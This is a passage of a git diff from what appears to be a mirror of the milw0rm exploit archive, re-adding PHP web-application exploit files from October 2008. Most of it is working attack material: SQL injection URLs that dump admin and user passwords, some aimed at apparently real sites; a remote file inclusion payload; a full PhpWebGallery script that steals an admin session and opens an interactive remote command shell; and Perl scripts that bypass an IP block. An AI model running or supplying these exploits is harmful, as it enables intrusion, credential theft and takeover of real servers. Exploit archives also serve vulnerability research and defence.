HTTP/1.1\r\n"; + + else + die("Error: Invalid method"); + + if(!empty($this->proxyuser)) + $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; + + if(!empty($this->header)) + $this->packet .= $this->showheader(); + + if(!empty($this->cookie)) + $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; + + $this->packet .= 'Host: '.$this->host."\r\n"; + $this->packet .= "Connection: Close\r\n"; + + if($this->method=='post') + { + $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data."\r\n"; + } + elseif($this->method=='formdata') + { + $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data; + } + + $this->packet .= "\r\n"; + $this->recv = ''; + + fputs($socket,$this->packet); + + while(!feof($socket)) + $this->recv .= fgets($socket); + + fclose($socket); + + if($this->cookiejar) + $this->getcookie(); + + if($this->allowredirection) + return $this->getredirection(); + else + return $this->recv; + } + + + /** + * This function allows you to add several + * cookies in the request. + * + * @access public + * @param string cookn CookieName + * @param string cookv CookieValue + * @example $this->addcookie('name','value') + * + */ + function addcookie($cookn,$cookv) + { + if(!isset($this->cookie)) + $this->cookie = array(); + + $this->cookie[$cookn] = $cookv; + } + + + /** + * This function allows you to add several + * headers in the request. 
+ * + * @access public + * @param string headern HeaderName + * @param string headervalue Headervalue + * @example $this->addheader('Client-IP', '128.5.2.3') + * + */ + function addheader($headern,$headervalue) + { + if(!isset($this->header)) + $this->header = array(); + + $this->header[$headern] = $headervalue; + } + + + /** + * This function allows you to use an + * http proxy server. Several methods + * are supported. + * + * @access public + * @param string proxy ProxyHost + * @param integer proxyp ProxyPort + * @example $this->proxy('localhost',8118) + * @example $this->proxy('localhost:8118') + * + */ + function proxy($proxy,$proxyp='') + { + if(empty($proxyp)) + { + $proxarr = explode(':',$proxy); + $this->proxyhost = $proxarr[0]; + $this->proxyport = (int)$proxarr[1]; + } + else + { + $this->proxyhost = $proxy; + $this->proxyport = (int)$proxyp; + } + + if($this->proxyport > 65535) + die("Error: Invalid port number"); + } + + + /** + * This function allows you to use an + * http proxy server which requires a + * basic authentification. Several + * methods are supported: + * + * @access public + * @param string proxyauth ProxyUser + * @param string proxypass ProxyPass + * @example $this->proxyauth('user','pwd') + * @example $this->proxyauth('user:pwd'); + * + */ + function proxyauth($proxyauth,$proxypass='') + { + if(empty($proxypass)) + { + $posvirg = strpos($proxyauth,':'); + $this->proxyuser = substr($proxyauth,0,$posvirg); + $this->proxypass = substr($proxyauth,$posvirg+1); + } + else + { + $this->proxyuser = $proxyauth; + $this->proxypass = $proxypass; + } + } + + + /** + * This function allows you to set + * the 'User-Agent' header. + * + * @access public + * @param string useragent Agent + * @example $this->agent('Firefox') + * + */ + function agent($useragent) + { + $this->addheader('User-Agent',$useragent); + } + + + /** + * This function returns the headers + * which will be in the next request. 
+ * + * @access public + * @return string $this->header_str Headers + * @example $this->showheader() + * + */ + function showheader() + { + $this->header_str = ''; + + if(!isset($this->header)) + return; + + foreach($this->header as $name => $value) + $this->header_str .= $name.': '.$value."\r\n"; + + return $this->header_str; + } + + + /** + * This function returns the cookies + * which will be in the next request. + * + * @access public + * @return string $this->cookie_str Cookies + * @example $this->showcookie() + * + */ + function showcookie() + { + $this->cookie_str = ''; + + if(!isset($this->cookie)) + return; + + foreach($this->cookie as $name => $value) + $this->cookie_str .= $name.'='.$value.'; '; + + return $this->cookie_str; + } + + + /** + * This function returns the last + * formed http request. + * + * @access public + * @return string $this->packet HttpPacket + * @example $this->showlastrequest() + * + */ + function showlastrequest() + { + if(!isset($this->packet)) + return; + else + return $this->packet; + } + + + /** + * This function sends the formed + * http packet with the GET method. + * + * @access public + * @param string url Url + * @return string $this->sock() + * @example $this->get('localhost/index.php?var=x') + * @example $this->get('http://localhost:88/tst.php') + * + */ + function get($url) + { + $this->target($url); + $this->method = 'get'; + return $this->sock(); + } + + + /** + * This function sends the formed + * http packet with the POST method. + * + * @access public + * @param string url Url + * @param string data PostData + * @return string $this->sock() + * @example $this->post('http://localhost/','helo=x') + * + */ + function post($url,$data) + { + $this->target($url); + $this->method = 'post'; + $this->data = $data; + return $this->sock(); + } + + + /** + * This function sends the formed http + * packet with the POST method using + * the multipart/form-data enctype. 
+ * + * @access public + * @param array array FormDataArray + * @return string $this->sock() + * @example $formdata = array( + * frmdt_url => 'http://localhost/upload.php', + * frmdt_boundary => '123456', # Optional + * 'var' => 'example', + * 'file' => array( + * frmdt_type => 'image/gif', # Optional + * frmdt_transfert => 'binary' # Optional + * frmdt_filename => 'hello.php, + * frmdt_content => '')); + * $this->formdata($formdata); + * + */ + function formdata($array) + { + $this->target($array[frmdt_url]); + $this->method = 'formdata'; + $this->data = ''; + + if(!isset($array[frmdt_boundary])) + $this->boundary = 'phpsploit'; + else + $this->boundary = $array[frmdt_boundary]; + + foreach($array as $key => $value) + { + if(!preg_match('#^frmdt_(boundary|url)#',$key)) + { + $this->data .= str_repeat('-',29).$this->boundary."\r\n"; + $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; + + if(!is_array($value)) + { + $this->data .= "\r\n\r\n".$value."\r\n"; + } + else + { + $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; + + if(isset($array[$key][frmdt_type])) + $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; + + if(isset($array[$key][frmdt_transfert])) + $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; + + $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; + } + } + } + + $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; + return $this->sock(); + } + + + /** + * This function returns the content + * of the server response, without + * the headers. 
+ * + * @access public + * @param string code ServerResponse + * @return string $this->server_content + * @example $this->getcontent() + * @example $this->getcontent($this->get('http://localhost/')) + * + */ + function getcontent($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_content = ''; + + for($i=1;$iserver_content .= $code[$i]; + + return $this->server_content; + } + + + /** + * This function returns the headers + * of the server response, without + * the content. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_header + * @example $this->getcontent() + * @example $this->getcontent($this->post('http://localhost/','1=2')) + * + */ + function getheader($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_header = $code[0]; + + return $this->server_header; + } + + + /** + * This function is called by the + * cookiejar() function. It adds the + * value of the "Set-Cookie" header + * in the "Cookie" header for the + * next request. You don't have to + * call it. + * + * @access private + * @param string code ServerResponse + * + */ + function getcookie() + { + foreach(explode("\r\n",$this->getheader()) as $header) + { + if(preg_match('/set-cookie/i',$header)) + { + $fequal = strpos($header,'='); + $fvirgu = strpos($header,';'); + + // 12=strlen('set-cookie: ') + $cname = substr($header,12,$fequal-12); + $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); + + $this->cookie[trim($cname)] = trim($cvalu); + } + } + } + + + /** + * This function is called by the + * get()/post() functions. You + * don't have to call it. 
+ * + * @access private + * @param string urltarg Url + * @example $this->target('http://localhost/') + * + */ + function target($urltarg) + { + if(!ereg('^http://',$urltarg)) + $urltarg = 'http://'.$urltarg; + + $urlarr = parse_url($urltarg); + $this->url = 'http://'.$urlarr['host'].$urlarr['path']; + + if(isset($urlarr['query'])) + $this->url .= '?'.$urlarr['query']; + + $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; + $this->host = $urlarr['host']; + + if($this->port != '80') + $this->host .= ':'.$this->port; + + if(!isset($urlarr['path']) or empty($urlarr['path'])) + die("Error: No path precised"); + + $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); + + if($this->port > 65535) + die("Error: Invalid port number"); + } + + + /** + * If you call this function, + * the script will extract all + * 'Set-Cookie' headers values + * and it will automatically add + * them into the 'Cookie' header + * for all next requests. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->cookiejar(0) + * @example $this->cookiejar(1) + * + */ + function cookiejar($code) + { + if($code=='0') + $this->cookiejar=FALSE; + + elseif($code=='1') + $this->cookiejar=TRUE; + } + + + /** + * If you call this function, + * the script will follow all + * redirections sent by the server. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->allowredirection(0) + * @example $this->allowredirection(1) + * + */ + function allowredirection($code) + { + if($code=='0') + $this->allowredirection=FALSE; + + elseif($code=='1') + $this->allowredirection=TRUE; + } + + + /** + * This function is called if + * allowredirection() is enabled. + * You don't have to call it. 
+ * + * @access private + * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) + * @return string $this->get($this->last_redirection) + * @return string $this->recv; + * + */ + function getredirection() + { + if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) + { + $this->last_redirection = trim($codearr[2]); + + if(!ereg('://',$this->last_redirection)) + return $this->get('http://'.$this->host.$this->path.$this->last_redirection); + + else + return $this->get($this->last_redirection); + } + else + return $this->recv; + } + + + /** + * This function allows you + * to reset some parameters. + * + * @access public + * @param string func Param + * @example $this->reset('header') + * @example $this->reset('cookie') + * @example $this->reset() + * + */ + function reset($func='') + { + switch($func) + { + case 'header': + $this->header = array(); + break; + + case 'cookie': + $this->cookie = array(); + break; + + default: + $this->cookiejar = ''; + $this->header = array(); + $this->cookie = array(); + $this->allowredirection = ''; + break; + } + } +} + +?> + +# milw0rm.com [2008-10-14] diff --git a/platforms/php/webapps/6751.txt b/platforms/php/webapps/6751.txt index ed24a7f93..36b35a39b 100755 --- a/platforms/php/webapps/6751.txt +++ b/platforms/php/webapps/6751.txt 
@@ -1,30 +1,30 @@
-**************************************************************************************
-
-Author : DaRkLiFe
-Greetz : str0ke & S.W.A.T. & funkys0ul
-
-**************************************************************************************
-Script :
-
-SezHoo 0.1 Remote File Inclusion Vulnerability
-
-Download:
-
-http://downloads.sourceforge.net/sezhoo/sezhoo.tar.gz?modtime=1220554562&big_mirror=0
-
-**************************************************************************************
-
-Exploit :
-
-http://site.com/sezhoo/SezHooTabsAndActions.php?IP=Sh3lLz?
-
-**************************************************************************************
-
-Vulnerable : line 21 : require_once( "$IP/includes/Defines.php" );
-
-**************************************************************************************
-
-THANKS ! GREETZ ! HAPPY DIWALI !
-**************************************************************************************
-
-# milw0rm.com [2008-10-14]
+**************************************************************************************
+
+Author : DaRkLiFe
+Greetz : str0ke & S.W.A.T. & funkys0ul
+
+**************************************************************************************
+Script :
+
+SezHoo 0.1 Remote File Inclusion Vulnerability
+
+Download:
+
+http://downloads.sourceforge.net/sezhoo/sezhoo.tar.gz?modtime=1220554562&big_mirror=0
+
+**************************************************************************************
+
+Exploit :
+
+http://site.com/sezhoo/SezHooTabsAndActions.php?IP=Sh3lLz?
+
+**************************************************************************************
+
+Vulnerable : line 21 : require_once( "$IP/includes/Defines.php" );
+
+**************************************************************************************
+
+THANKS ! GREETZ ! HAPPY DIWALI !
+**************************************************************************************
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6754.txt b/platforms/php/webapps/6754.txt
index ac9ace40e..1d29cf3fb 100755
--- a/platforms/php/webapps/6754.txt
+++ b/platforms/php/webapps/6754.txt
@@ -1,37 +1,37 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -# Author : Hakxer -# Home : Www.educ-up.com -# Type Gap : Sq1 inj3ct1on -# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm -# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil -# Team : EgY Coders -################################################################################################# -####### [+] Bug in : success_story.php -## Dork : " Developed by Infoware Solutions " -### POC - http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())-- - -### Exploit iN L!ve Script -# [+] Get Version & Database Name [~] -# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())-- -# [+] Get ID&Pass [~] -# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin-- - -# [+] HaVe Fun .. ^_^ ; - - -############################################################################### - --------------------------------- The End of Gap ----------------------------------- - -## Contact : aq5@windowslive.com -### Muslim Hacker .. 
I love you Mohammed Rasull Allah -###################################################### - -# milw0rm.com [2008-10-14] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +# Author : Hakxer +# Home : Www.educ-up.com +# Type Gap : Sq1 inj3ct1on +# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm +# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil +# Team : EgY Coders +################################################################################################# +####### [+] Bug in : success_story.php +## Dork : " Developed by Infoware Solutions " +### POC + http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())-- + +### Exploit iN L!ve Script +# [+] Get Version & Database Name [~] +# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())-- +# [+] Get ID&Pass [~] +# http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin-- + +# [+] HaVe Fun .. ^_^ ; + + +############################################################################### + +-------------------------------- The End of Gap ----------------------------------- + +## Contact : aq5@windowslive.com +### Muslim Hacker .. I love you Mohammed Rasull Allah +###################################################### + +# milw0rm.com [2008-10-14] diff --git a/platforms/php/webapps/6755.php b/platforms/php/webapps/6755.php index e6999e206..d7e50e575 100755 --- a/platforms/php/webapps/6755.php +++ b/platforms/php/webapps/6755.php 
@@ -1,172 +1,172 @@ -$b['.$sort.'];' ) - 64. ); - - An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed - to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can - access to the plugins management interface, but the attacker might be able to retrieve a valid - admin session id using the SQL injection bug in comments.php (see lines 325-340) -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout",5); - -define(STDIN, fopen("php://stdin", "r")); -define(PATTERN, "/(.*)<\/span> -/"); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again...\n"; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -function check_target() -{ - global $host, $path, $prefix, $default_record; - - $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match); - $prefix = $match[1]; - - preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match); - $default_record = $match[1]; - - preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match); - if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n"); -} - -function encodeSQL($sql) -{ - for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); - return "CONCAT(0x{$encoded})"; -} - -function get_sid() -{ - global $host, $path, $prefix, $default_record; - - $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z - $index = 1; - $sid = ""; - - $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; - 
$packet .= "Host: {$host}\r\n"; - $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - print "\n[-] Fetching admin SID: "; - - while (!strpos($sid, chr(0))) - { - for ($i = 0, $n = count($chars); $i <= $n; $i++) - { - if ($i == $n) die("\n\n[-] Exploit failed...try later!\n"); - - $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions". - "/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*"; - - preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); - if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } - } - - $index++; - } - - print "\n"; - return $sid; -} - -function check_plugin() -{ - global $host, $path, $sid; - - $packet = "GET {$path}%s HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Cookie: pwg_id={$sid}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - // check if the event_tracer plugin isn't installed - if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) - { - http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); - http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); - } -} - -print "\n+---------------------------------------------------------------------------+"; -print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |"; -print "\n+---------------------------------------------------------------------------+\n"; - -if ($argc < 3) -{ - print "\nUsage...: php $argv[0] host path [sid]\n"; - print "\nhost....: target server (ip/hostname)"; - print "\npath....: path to PhpWebGallery directory"; - print "\nsid.....: a valid admin session id\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -check_target(); - -$sid = (isset($argv[3])) ? 
$argv[3] : get_sid(); - -check_plugin(); - -$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23"; -$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Cookie: pwg_id={$sid}\r\n"; -$packet .= "Cmd: %s\r\n"; -$packet .= "Connection: close\r\n\r\n"; - -while(1) -{ - print "\nphpwebgallery-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $response = http_send($host, sprintf($packet, base64_encode($cmd))); - preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n"); - } - else break; -} - -?> - -# milw0rm.com [2008-10-14] +$b['.$sort.'];' ) + 64. ); + + An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed + to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can + access to the plugins management interface, but the attacker might be able to retrieve a valid + admin session id using the SQL injection bug in comments.php (see lines 325-340) +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout",5); + +define(STDIN, fopen("php://stdin", "r")); +define(PATTERN, "/(.*)<\/span> -/"); + +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again...\n"; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} + +function check_target() +{ + global $host, $path, $prefix, $default_record; + + $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match); + $prefix = 
$match[1]; + + preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match); + $default_record = $match[1]; + + preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match); + if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n"); +} + +function encodeSQL($sql) +{ + for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); + return "CONCAT(0x{$encoded})"; +} + +function get_sid() +{ + global $host, $path, $prefix, $default_record; + + $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z + $index = 1; + $sid = ""; + + $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + print "\n[-] Fetching admin SID: "; + + while (!strpos($sid, chr(0))) + { + for ($i = 0, $n = count($chars); $i <= $n; $i++) + { + if ($i == $n) die("\n\n[-] Exploit failed...try later!\n"); + + $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions". 
+ "/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*"; + + preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); + if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } + } + + $index++; + } + + print "\n"; + return $sid; +} + +function check_plugin() +{ + global $host, $path, $sid; + + $packet = "GET {$path}%s HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Cookie: pwg_id={$sid}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + // check if the event_tracer plugin isn't installed + if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) + { + http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); + http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); + } +} + +print "\n+---------------------------------------------------------------------------+"; +print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |"; +print "\n+---------------------------------------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage...: php $argv[0] host path [sid]\n"; + print "\nhost....: target server (ip/hostname)"; + print "\npath....: path to PhpWebGallery directory"; + print "\nsid.....: a valid admin session id\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +check_target(); + +$sid = (isset($argv[3])) ? 
$argv[3] : get_sid(); + +check_plugin(); + +$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23"; +$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Cookie: pwg_id={$sid}\r\n"; +$packet .= "Cmd: %s\r\n"; +$packet .= "Connection: close\r\n\r\n"; + +while(1) +{ + print "\nphpwebgallery-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $response = http_send($host, sprintf($packet, base64_encode($cmd))); + preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n"); + } + else break; +} + +?> + +# milw0rm.com [2008-10-14] diff --git a/platforms/php/webapps/6758.txt b/platforms/php/webapps/6758.txt index c5a995523..4f2dc1962 100755 --- a/platforms/php/webapps/6758.txt +++ b/platforms/php/webapps/6758.txt 
@@ -1,33 +1,33 @@ -# AstroSPACES (profile.php) SQL - - Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007 -######################################################################### -# -# AUTHOR : TurkishWarriorr (Sehitler Ölmez Vatan Bölünmez ....) -# -# HOME : http://www.1923turk.org -# -######################################################################### -# -# DORK : Powered By AstroSPACES -# -########################################################################## -EXPLOIT : - -profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users-- - - -test sites: - -http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users-- - - -E mail login : - -http://quirino.com.ph/friendster/space.php?action=memberlist - -########################################################################## - www.1923turk.org - turkish-warriorr@hotmail.com - -# milw0rm.com [2008-10-15] +# AstroSPACES (profile.php) SQL + + Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007 +######################################################################### +# +# AUTHOR : TurkishWarriorr (Sehitler Ölmez Vatan Bölünmez ....) 
+# +# HOME : http://www.1923turk.org +# +######################################################################### +# +# DORK : Powered By AstroSPACES +# +########################################################################## +EXPLOIT : + +profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users-- + + +test sites: + +http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users-- + + +E mail login : + +http://quirino.com.ph/friendster/space.php?action=memberlist + +########################################################################## + www.1923turk.org + turkish-warriorr@hotmail.com + +# milw0rm.com [2008-10-15] diff --git a/platforms/php/webapps/6759.txt b/platforms/php/webapps/6759.txt index 4edd3ead3..2016b6f35 100755 --- a/platforms/php/webapps/6759.txt +++ b/platforms/php/webapps/6759.txt 
@@ -1,110 +1,110 @@ -# myStats (hits.php) Multiple Remote Vulnerabilities Exploit -# url: http://mywebland.com/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: All Hackers and milw0rm website - ---------------------- -Break System Block IP ---------------------- - -<> - -7: if (@getenv("HTTP_X_FORWARDED_FOR")) - - { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } - - else { $u_ip = @getenv("REMOTE_ADDR"); } - - - - if ($u_ip == BLOCK_IP) - - { return 1; - -13: exit; } - -<> - -11: define("BLOCK_IP", "127.0.0.1"); - -<> - -use HTTP::Request; -use LWP::UserAgent; - -my $web="http://localhost/hits.php"; -my $ua=LWP::UserAgent->new(); -$ua->default_header('X-Forwarded-For' => "127.1.1.1"); -my $respuesta=HTTP::Request->new(GET=>$web); -$ua->timeout(30); -my $response=$ua->request($respuesta); -$contenido=$response->content; -if ($response->is_success) -{ -open(FILE,">>results.txt"); -print FILE "$contenido\n"; -close(FILE); -print "\n[+] Exploit Succesful!\n\n"; -} -else -{ -print "\n[-] Exploit Failed!\n\n"; -} - -<> - -$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP - -------------- -SQL Injection -------------- - -<> - -63: if (isset($_GET['sortby'])) - - {$sortby = $_GET['sortby'];} - - else - - { $sortby = 'timestamp' ;} - - - $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ; - -69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.
    " . mysql_error()); - -<> - -use HTTP::Request; -use LWP::UserAgent; - -my $web="http://localhost/hits.php?sortby=1'"; -my $ua=LWP::UserAgent->new(); -my $respuesta=HTTP::Request->new(GET=>$web); -$ua->timeout(30); -my $response=$ua->request($respuesta); -$contenido=$response->content; -if ($response->is_success) -{ -if($contenido =~ /You have an error in your SQL syntax;/) -{ -print "\n[+] Exploit Succesful!\n"; -print "\n[+] Content:\n"; -print "$contenido\n\n"; -} -} -else -{ -print "\n[-] Exploit Failed!\n\n"; -} - -# milw0rm.com [2008-10-15] +# myStats (hits.php) Multiple Remote Vulnerabilities Exploit +# url: http://mywebland.com/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: All Hackers and milw0rm website + +--------------------- +Break System Block IP +--------------------- + +<> + +7: if (@getenv("HTTP_X_FORWARDED_FOR")) + + { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } + + else { $u_ip = @getenv("REMOTE_ADDR"); } + + + + if ($u_ip == BLOCK_IP) + + { return 1; + +13: exit; } + +<> + +11: define("BLOCK_IP", "127.0.0.1"); + +<> + +use HTTP::Request; +use LWP::UserAgent; + +my $web="http://localhost/hits.php"; +my $ua=LWP::UserAgent->new(); +$ua->default_header('X-Forwarded-For' => "127.1.1.1"); +my $respuesta=HTTP::Request->new(GET=>$web); +$ua->timeout(30); +my $response=$ua->request($respuesta); +$contenido=$response->content; +if ($response->is_success) +{ +open(FILE,">>results.txt"); +print FILE "$contenido\n"; +close(FILE); +print "\n[+] Exploit Succesful!\n\n"; +} +else +{ +print "\n[-] Exploit Failed!\n\n"; +} + +<> + +$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP + +------------- +SQL Injection +------------- + +<> + +63: if (isset($_GET['sortby'])) + + {$sortby = $_GET['sortby'];} + + else + + { 
$sortby = 'timestamp' ;} + + + $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ; + +69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.
